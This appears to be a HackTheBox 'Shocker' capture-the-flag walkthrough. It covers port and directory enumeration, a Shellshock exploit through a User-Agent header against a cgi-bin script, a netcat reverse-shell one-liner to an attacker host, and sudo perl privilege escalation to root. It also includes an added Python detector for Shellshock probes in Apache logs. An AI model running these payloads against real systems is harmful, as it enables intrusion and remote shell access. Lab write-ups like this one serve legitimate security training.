HackTheBox: Shocker

ratiros01
3 min read · Mar 30, 2021
1. Port scan

nmap -Pn 10.10.10.56
nmap -Pn -p1000- 10.10.10.56

There are 2 open ports: 80 and 2222.

2. OS and service scan

nmap -A -p80,2222 10.10.10.56

3. Vuln scan

nmap --script vuln -p80,2222 10.10.10.56

4. nikto

nikto -h http://10.10.10.56

5. gobuster and dirb

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.10.10.56/ -x php,txt,html,sh,cgi -q

While waiting for gobuster forever, I decided to use dirb instead.

dirb http://10.10.10.56/

Further directory enumeration, starting with cgi-bin:

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.10.10.56/cgi-bin/ -x php,txt,html,sh,cgi -q

There’s user.sh.

6. Access HTTP Site

Nothing more.

7. HTTP Shellshock

Since I have user.sh in cgi-bin, let’s test for Shellshock:

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://10.10.10.56/cgi-bin/user.sh

It succeeded. I can proceed to getting a reverse shell.
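Added here as a defender-side check, not part of the original writeup: the probe above lands in Apache's access log because the combined format records the User-Agent, so it can be flagged after the fact. This example (my own code; the sample log lines are constructed) parses combined-format lines, matches the `() {` function-export marker in the User-Agent or Referer, and rates a hit against a cgi-bin script that returned 200 higher than a probe against a static page.

```python
import re
from typing import Dict, List, Optional

# Apache "combined" access log: it records the User-Agent, which is exactly the
# header the writeup abuses, so the probe is visible server-side.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>(?:[^"\\]|\\.)*)"$'
)

# Shellshock marker: a bash function export "() {" at the start of a header value.
# mod_cgi copies request headers into environment variables (HTTP_USER_AGENT,
# HTTP_REFERER, ...) and unpatched bash ran whatever followed the closing "}".
SHELLSHOCK_RE = re.compile(r'\(\s*\)\s*\{')


def classify(line: str) -> Optional[Dict[str, str]]:
    """Return a finding for one log line, or None if it is not a Shellshock probe."""
    m = COMBINED_RE.match(line)
    if m is None:
        return None
    tainted = [v for v in (m.group("ua"), m.group("referer")) if SHELLSHOCK_RE.search(v)]
    if not tainted:
        return None
    path = m.group("path")
    # A 200 against a cgi-bin script means the server ran it with the hostile
    # environment; a probe against anything else is still worth an alert.
    executed = path.startswith("/cgi-bin/") and m.group("status") == "200"
    return {"src": m.group("ip"), "time": m.group("ts"), "path": path,
            "severity": "high" if executed else "medium", "payload": tainted[0]}


def scan(log_text: str) -> List[Dict[str, str]]:
    """Scan a whole access log and return all Shellshock findings in order."""
    return [f for f in (classify(l) for l in log_text.splitlines()) if f]


# Constructed sample log: a normal request, the writeup's probe against user.sh,
# and the same payload against a static page that mod_cgi never hands to bash.
SAMPLE_LOG = """\
10.10.14.5 - - [30/Mar/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 137 "-" "Mozilla/5.0"
10.10.14.5 - - [30/Mar/2021:10:02:10 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'"
10.10.14.5 - - [30/Mar/2021:10:02:11 +0000] "GET /index.html HTTP/1.1" 404 0 "-" "() { :; }; /bin/bash -c 'id'"
"""
```

Run `scan(open("/var/log/apache2/access.log").read())` against a real combined-format log to get the same findings; the actual fix is a patched bash, which no longer imports function definitions from arbitrary environment variables.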

Prepare the listener:

rlwrap nc -lvp 443

Get the reverse shell using this command:

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attacker ip> 443 >/tmp/f'" http://10.10.10.56/cgi-bin/user.sh

Back to the listener, I got the shell.

8. Privilege Escalation

Start by exploring the directories:

cd /home
ls -la
cd shelly
ls -la

I got user.txt.

Another thing is .sudo_as_admin_successful.

Verify sudo:

sudo -l

I can use perl.

Using the guide from GTFOBins:

sudo perl -e 'exec "/bin/sh";'
cd /root
ls -la
